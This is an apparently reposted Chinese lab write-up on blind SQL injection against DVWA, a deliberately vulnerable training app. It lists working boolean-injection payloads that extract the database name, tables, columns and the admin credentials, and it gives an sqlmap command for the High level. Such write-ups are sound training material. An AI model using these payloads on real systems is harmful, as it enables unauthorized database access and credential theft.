DVWA SQL Injection(blind)(SQL盲注)全等级

x33g5p2x  于2022-02-12 转载在 其他  
字(3.0k)|赞(0)|评价(0)|浏览(422)

SQL Injection(blind)(盲注)

1. Low

手工注入方法

服务端只会返回不会显示搜索值,此类无回显的SQL注入称作SQL盲注。

本题只会返回用户存在与否,即真假,此类盲注成为布尔(bool)盲注。

注入思路是猜解库表字段和数据的长度,每个猜完长度之后猜解每一位字符的ascii值,然后拼接之后形成字符。

1' and length(database())=4 #
库长度4
1' and ascii(substr(database(),1,1))=100 #
1'+and+ascii(substr(database(),2,1))=118 #
1'+and+ascii(substr(database(),3,1))=119 #
1'+and+ascii(substr(database(),4,1))=97 #
库名dvwa
------------------------------------------------------------------------------
1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=2 #
表个数2个
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #
第一个表长度9
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,2),1))=5 #
第二个表长度5
------------------------------------------------------------------------------
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=117 #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=115 #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=101 #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=114 #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),5,1))=115 #
表名users
------------------------------------------------------------------------------
1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=8 #
表有8个字段
1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='user')=1 #
1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1 #
表里有user和password字段
------------------------------------------------------------------------------
1' and (select count(*) from users where user='admin' and password='5f4dcc3b5aa765d61d8327deb882cf99')=1 #
存在user为admin和password为5f4dcc3b5aa765d61d8327deb882cf99(password)的字段。

最后猜到一个账号为admin密码为password的数据,尝试登录发现登录成功。

2.Medium

多了mysqli_real_escape_string函数

数值型注入

基本思路和Low一样,因为只能选择仅有的几个选项,所以要在burp里抓包发送数据包注入。

然后mysqli_real_escape_string()函数过滤掉了一些特殊字符,用到单引号的时候要把值修改成16进制然后替代之前的值

下图可以看到盲注成功。

3.High

多了LIMIT 1,但因为可以注释,所以LIMIT没什么用

用burp抓包修改,思路和Low不能说一样,只能说一模一样

4.Impossible

和SQL回显注入篇的Impossible一样加了好多限制,所以无法注入。

5.运用sqlmap自动化注入

当涉及到大量重复的猜解的时候,脚本工具的优势就体现到了,自动化注入真的太舒服了!

试一下sqlmap注入盲注High等级

输入如下

python sqlmap.py -u “192.168.171.10/vulnerabilities/sqli_blind/cookie-input.php” 
 --data="id=3&Submit=Submit" 
 --second-url “http://192.168.171.10/vulnerabilities/sqli_blind/”
 --cookie=“id=121; PHPSESSID=vcgj00i5rqo0ceeti439abogs4; security=high”
 --batch

-u指定url地址,–data指定POST传递的数据,

–second-url指定二阶响应的结果显示页面的url,本等级中192.168.171.10/vulnerabilities/sqli_blind/cookie-input.php为输入参数的地址,而http://192.168.171.10/vulnerabilities/sqli_blind/为显示结果的地址,两个不在同一个页面上,所以要设置second-url

–cookie指定cookie值,–batch表示不询问用户输入选择,自动使用默认配置

下图为注入最终结果

相关文章